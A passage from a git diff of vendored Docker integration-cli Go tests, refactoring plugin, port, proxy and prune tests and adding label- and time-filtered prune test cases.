&initialValue, Settable: []string{"value"}}} + cfg.Mounts = []types.PluginMount{ + {Name: "pmount1", Settable: []string{"source"}, Type: "none", Source: &mntSrc}, + {Name: "pmount2", Settable: []string{"source"}, Type: "none"}, // Mount without source is invalid. + } + cfg.Linux.Devices = []types.PluginDevice{ + {Name: "pdev1", Path: &devPath, Settable: []string{"path"}}, + {Name: "pdev2", Settable: []string{"path"}}, // Device without Path is invalid. + } + }) + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name) c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") - dockerCmd(c, "plugin", "set", pName, "DEBUG=1") + dockerCmd(c, "plugin", "set", name, "DEBUG=1") - env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName) + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", name) c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name) + c.Assert(strings.TrimSpace(env), checker.Contains, mntSrc) + + dockerCmd(c, "plugin", "set", name, "pmount1.source=bar") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}", name) + c.Assert(strings.TrimSpace(env), checker.Contains, "bar") + + out, _, err := dockerCmdWithError("plugin", "set", name, "pmount2.source=bar2") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Plugin config has no mount source") + + out, _, err = dockerCmdWithError("plugin", "set", name, "pdev2.path=/dev/bar2") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Plugin config has no device path") + } -func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInstallArgs(c *check.C) { + pName := path.Join(ps.registryHost(), "plugin", "testplugininstallwithargs") + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + plugin.CreateInRegistry(ctx, pName, nil, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Settable: []string{"value"}}} + }) + out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1") c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -171,8 +223,8 @@ func (s *DockerSuite) TestPluginInstallArgs(c *check.C) { c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") } -func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64) +func (ps *DockerPluginSuite) TestPluginInstallImage(c *check.C) { + testRequires(c, IsAmd64) repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) // tag the image to upload it to the private registry @@ -182,11 +234,12 @@ func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) { out, _, err := dockerCmdWithError("plugin", "install", repoName) c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "target is image") + c.Assert(out, checker.Contains, `Encountered remote "application/vnd.docker.container.image.v1+json"(image) when fetching`) } -func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginEnableDisableNegative(c *check.C) { + pName := ps.getPluginRepoWithTag() + out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, pName) @@ -206,9 +259,7 @@ func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) { c.Assert(err, checker.IsNil) } -func (s *DockerSuite) TestPluginCreate(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - +func (ps *DockerPluginSuite) TestPluginCreate(c *check.C) { name := "foo/bar-driver" temp, err := ioutil.TempDir("", "foo") c.Assert(err, checker.IsNil) @@ -240,15 +291,15 @@ func (s *DockerSuite) TestPluginCreate(c *check.C) { c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2) } -func (s *DockerSuite) TestPluginInspect(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginInspect(c *check.C) { + pNameWithTag := ps.getPluginRepoWithTag() + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) c.Assert(err, checker.IsNil) out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, pName) - c.Assert(out, checker.Contains, pTag) + c.Assert(out, checker.Contains, pNameWithTag) c.Assert(out, checker.Contains, "true") // Find the ID first @@ -273,7 +324,7 @@ func (s *DockerSuite) TestPluginInspect(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, id) // Name without tag form - out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName) + out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", ps.getPluginRepo()) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Equals, id) @@ -300,68 +351,96 @@ func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) { c.Assert(err.Error(), checker.Contains, "plugins are not supported on this platform") } -func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginIDPrefix(c *check.C) { + name := "test" + client := testEnv.APIClient() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + initialValue := "0" + err := plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Env = []types.PluginEnv{{Name: "DEBUG", Value: &initialValue, Settable: []string{"value"}}} + }) + cancel() - trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install") + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) - installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName) - s.trustedCmd(installCmd) - out, _, err := runCommandWithOutput(installCmd) + // Find ID first + id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", name) + id = strings.TrimSpace(id) + c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + // List current state + out, _, err := dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, "false") + + env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5]) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]") + dockerCmd(c, "plugin", "set", id[:5], "DEBUG=1") + + env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", id[:5]) + c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]") + + // Enable + _, _, err = dockerCmdWithError("plugin", "enable", id[:5]) + c.Assert(err, checker.IsNil) out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) c.Assert(out, checker.Contains, "true") - out, _, err = dockerCmdWithError("plugin", "disable", trustedName) + // Disable + _, _, err = dockerCmdWithError("plugin", "disable", id[:5]) c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) - - out, _, err = dockerCmdWithError("plugin", "enable", trustedName) + out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, "false") - out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName) + // Remove + out, _, err = dockerCmdWithError("plugin", "remove", id[:5]) c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Contains, trustedName) - - // Try untrusted pull to ensure we pushed the tag to the registry - installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName) - s.trustedCmd(installCmd) - out, _, err = runCommandWithOutput(installCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - + // List returns none out, _, err = dockerCmdWithError("plugin", "ls") c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "true") - + c.Assert(out, checker.Not(checker.Contains), name) } -func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) +func (ps *DockerPluginSuite) TestPluginListDefaultFormat(c *check.C) { + config, err := ioutil.TempDir("", "config-file-") + c.Assert(err, check.IsNil) + defer os.RemoveAll(config) - pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL) - // install locally and push to private registry - dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag) - dockerCmd(c, "plugin", "push", pluginName) - dockerCmd(c, "plugin", "rm", "-f", pluginName) + err = ioutil.WriteFile(filepath.Join(config, "config.json"), []byte(`{"pluginsFormat": "raw"}`), 0644) + c.Assert(err, check.IsNil) + + name := "test:latest" + client := testEnv.APIClient() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + err = plugin.Create(ctx, client, name, func(cfg *plugin.Config) { + cfg.Description = "test plugin" + }) + c.Assert(err, checker.IsNil, check.Commentf("failed to create test plugin")) + + out, _ := dockerCmd(c, "plugin", "inspect", "--format", "{{.ID}}", name) + id := strings.TrimSpace(out) - // Try trusted install on untrusted plugin - installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName) - s.trustedCmd(installCmd) - out, _, err := runCommandWithOutput(installCmd) + // We expect the format to be in `raw + --no-trunc` + expectedOutput := fmt.Sprintf(`plugin_id: %s +name: %s +description: test plugin +enabled: false`, id, name) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, _ = dockerCmd(c, "--config", config, "plugin", "ls", "--no-trunc") + c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput) } func (s *DockerSuite) TestPluginUpgrade(c *check.C) { - testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64, NotUserNamespace) plugin := "cpuguy83/docker-volume-driver-plugin-local:latest" pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2" @@ -377,17 +456,38 @@ func (s *DockerSuite) TestPluginUpgrade(c *check.C) { id := strings.TrimSpace(out) // make sure "v2" does not exists - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2")) c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out)) dockerCmd(c, "plugin", "disable", "-f", plugin) dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2) // make sure "v2" file exists - _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + _, err = os.Stat(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "plugins", id, "rootfs", "v2")) c.Assert(err, checker.IsNil) dockerCmd(c, "plugin", "enable", plugin) dockerCmd(c, "volume", "inspect", "bananas") dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core") } + +func (s *DockerSuite) TestPluginMetricsCollector(c *check.C) { + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + d := daemon.New(c, dockerBinary, dockerdBinary) + d.Start(c) + defer d.Stop(c) + + name := "cpuguy83/docker-metrics-plugin-test:latest" + r := cli.Docker(cli.Args("plugin", "install", "--grant-all-permissions", name), cli.Daemon(d)) + c.Assert(r.Error, checker.IsNil, check.Commentf(r.Combined())) + + // plugin lisens on localhost:19393 and proxies the metrics + resp, err := http.Get("http://localhost:19393/metrics") + c.Assert(err, checker.IsNil) + defer resp.Body.Close() + + b, err := ioutil.ReadAll(resp.Body) + c.Assert(err, checker.IsNil) + // check that a known metric is there... don't expect this metric to change over time.. probably safe + c.Assert(string(b), checker.Contains, "container_actions") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go index 80b00fe93e..84058cda10 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go @@ -5,9 +5,10 @@ import ( "net" "regexp" "sort" + "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -148,9 +149,8 @@ func (s *DockerSuite) TestPortList(c *check.C) { out, _ = dockerCmd(c, "port", ID) - err = assertPortList(c, out, []string{ - "80/tcp -> 0.0.0.0:8000", - "80/udp -> 0.0.0.0:8000"}) + // Running this test multiple times causes the TCP port to increment. + err = assertPortRange(c, out, []int{8000, 8080}, []int{8000, 8080}) // Port list is not correct c.Assert(err, checker.IsNil) dockerCmd(c, "rm", "-f", ID) @@ -173,6 +173,38 @@ func assertPortList(c *check.C, out string, expected []string) error { return nil } +func assertPortRange(c *check.C, out string, expectedTcp, expectedUdp []int) error { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + var validTcp, validUdp bool + for _, l := range lines { + // 80/tcp -> 0.0.0.0:8015 + port, err := strconv.Atoi(strings.Split(l, ":")[1]) + if err != nil { + return err + } + if strings.Contains(l, "tcp") && expectedTcp != nil { + if port < expectedTcp[0] || port > expectedTcp[1] { + return fmt.Errorf("tcp port (%d) not in range expected range %d-%d", port, expectedTcp[0], expectedTcp[1]) + } + validTcp = true + } + if strings.Contains(l, "udp") && expectedUdp != nil { + if port < expectedUdp[0] || port > expectedUdp[1] { + return fmt.Errorf("udp port (%d) not in range expected range %d-%d", port, expectedUdp[0], expectedUdp[1]) + } + validUdp = true + } + } + if !validTcp { + return fmt.Errorf("tcp port not found") + } + if !validUdp { + return fmt.Errorf("udp port not found") + } + return nil +} + func stopRemoveContainer(id string, c *check.C) { dockerCmd(c, "rm", "-f", id) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go index 1cf569b806..52159aa9c5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go @@ -2,23 +2,20 @@ package main import ( "net" - "os/exec" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) { - testRequires(c, DaemonIsLinux) - testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://.. - - cmd := exec.Command(dockerBinary, "info") - cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999") - - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + testRequires(c, DaemonIsLinux, SameHostDaemon) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999"), + }).Assert(c, icmd.Success) } // Can't use localhost here since go has a special case to not use proxy if connecting to localhost @@ -40,14 +37,15 @@ func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) { c.Assert(ip, checker.Not(checker.Equals), "") - err = s.d.Start("-H", "tcp://"+ip+":2375") - c.Assert(err, checker.IsNil) - cmd := exec.Command(dockerBinary, "info") - cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"} - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + s.d.Start(c, "-H", "tcp://"+ip+":2375") + + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"}, + }).Assert(c, icmd.Expected{Error: "exit status 1", ExitCode: 1}) // Test with no_proxy - cmd.Env = append(cmd.Env, "NO_PROXY="+ip) - out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info")) - c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "info"}, + Env: []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999", "NO_PROXY=" + ip}, + }).Assert(c, icmd.Success) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go index dabbc72081..d60420b591 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go @@ -3,23 +3,39 @@ package main import ( + "io/ioutil" + "os" + "path/filepath" "strconv" "strings" + "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" "github.com/go-check/check" + "gotest.tools/icmd" ) -func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) { +func pruneNetworkAndVerify(c *check.C, d *daemon.Daemon, kept, pruned []string) { _, err := d.Cmd("network", "prune", "--force") c.Assert(err, checker.IsNil) - out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") - c.Assert(err, checker.IsNil) + for _, s := range kept { - c.Assert(out, checker.Contains, s) + waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + return out, nil + }, checker.Contains, s) } + for _, s := range pruned { - c.Assert(out, checker.Not(checker.Contains), s) + waitAndAssert(c, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + return out, nil + }, checker.Not(checker.Contains), s) } } @@ -40,13 +56,14 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { serviceName := "testprunesvc" replicas := 1 - out, err := d.Cmd("service", "create", "--name", serviceName, + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", + "--name", serviceName, "--replicas", strconv.Itoa(replicas), "--network", "n3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, replicas+1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas+1) // prune and verify pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"}) @@ -56,20 +73,23 @@ func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { c.Assert(err, checker.IsNil) _, err = d.Cmd("service", "rm", serviceName) c.Assert(err, checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) + pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"}) } func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) - out, _, err := s.d.buildImageWithOut("test", - `FROM busybox - LABEL foo=bar`, true, "-q") - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + result := cli.BuildCmd(c, "test", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL foo=bar`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id := strings.TrimSpace(result.Combined()) - out, err = s.d.Cmd("images", "-q", "--no-trunc") + out, err := s.d.Cmd("images", "-q", "--no-trunc") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Contains, id) @@ -89,3 +109,201 @@ func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) } + +func (s *DockerSuite) TestPruneContainerUntil(c *check.C) { + out := cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id1 := strings.TrimSpace(out) + cli.WaitExited(c, id1, 5*time.Second) + + until := daemonUnixTime(c) + + out = cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id2 := strings.TrimSpace(out) + cli.WaitExited(c, id2, 5*time.Second) + + out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "until="+until).Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) +} + +func (s *DockerSuite) TestPruneContainerLabel(c *check.C) { + out := cli.DockerCmd(c, "run", "-d", "--label", "foo", "busybox").Combined() + id1 := strings.TrimSpace(out) + cli.WaitExited(c, id1, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "--label", "bar", "busybox").Combined() + id2 := strings.TrimSpace(out) + cli.WaitExited(c, id2, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "busybox").Combined() + id3 := strings.TrimSpace(out) + cli.WaitExited(c, id3, 5*time.Second) + + out = cli.DockerCmd(c, "run", "-d", "--label", "foobar", "busybox").Combined() + id4 := strings.TrimSpace(out) + cli.WaitExited(c, id4, 5*time.Second) + + // Add a config file of label=foobar, that will have no impact if cli is label!=foobar + config := `{"pruneFilters": ["label=foobar"]}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + // With config.json only, prune based on label=foobar + out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + c.Assert(strings.TrimSpace(out), checker.Contains, id4) + + out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label=foo").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out = cli.DockerCmd(c, "container", "prune", "--force", "--filter", "label!=bar").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + // With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede + out = cli.DockerCmd(c, "--config", d, "container", "prune", "--force", "--filter", "label!=foobar").Combined() + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out = cli.DockerCmd(c, "ps", "-a", "-q", "--no-trunc").Combined() + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) +} + +func (s *DockerSuite) TestPruneVolumeLabel(c *check.C) { + out, _ := dockerCmd(c, "volume", "create", "--label", "foo") + id1 := strings.TrimSpace(out) + c.Assert(id1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create", "--label", "bar") + id2 := strings.TrimSpace(out) + c.Assert(id2, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create") + id3 := strings.TrimSpace(out) + c.Assert(id3, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "volume", "create", "--label", "foobar") + id4 := strings.TrimSpace(out) + c.Assert(id4, checker.Not(checker.Equals), "") + + // Add a config file of label=foobar, that will have no impact if cli is label!=foobar + config := `{"pruneFilters": ["label=foobar"]}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + // With config.json only, prune based on label=foobar + out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + c.Assert(strings.TrimSpace(out), checker.Contains, id4) + + out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label=foo") + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out, _ = dockerCmd(c, "volume", "prune", "--force", "--filter", "label!=bar") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + c.Assert(strings.TrimSpace(out), checker.Contains, id3) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id3) + + // With config.json label=foobar and CLI label!=foobar, CLI label!=foobar supersede + out, _ = dockerCmd(c, "--config", d, "volume", "prune", "--force", "--filter", "label!=foobar") + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, _ = dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) +} + +func (s *DockerSuite) TestPruneNetworkLabel(c *check.C) { + dockerCmd(c, "network", "create", "--label", "foo", "n1") + dockerCmd(c, "network", "create", "--label", "bar", "n2") + dockerCmd(c, "network", "create", "n3") + + out, _ := dockerCmd(c, "network", "prune", "--force", "--filter", "label=foo") + c.Assert(strings.TrimSpace(out), checker.Contains, "n1") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3") + + out, _ = dockerCmd(c, "network", "prune", "--force", "--filter", "label!=bar") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n2") + c.Assert(strings.TrimSpace(out), checker.Contains, "n3") + + out, _ = dockerCmd(c, "network", "prune", "--force") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n1") + c.Assert(strings.TrimSpace(out), checker.Contains, "n2") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), "n3") +} + +func (s *DockerDaemonSuite) TestPruneImageLabel(c *check.C) { + s.d.StartWithBusybox(c) + + result := cli.BuildCmd(c, "test1", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL foo=bar`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id1 := strings.TrimSpace(result.Combined()) + out, err := s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + + result = cli.BuildCmd(c, "test2", cli.Daemon(s.d), + build.WithDockerfile(`FROM busybox + LABEL bar=foo`), + cli.WithFlags("-q"), + ) + result.Assert(c, icmd.Success) + id2 := strings.TrimSpace(result.Combined()) + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=foo=bar") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label!=bar=foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2) + + out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=bar=foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go 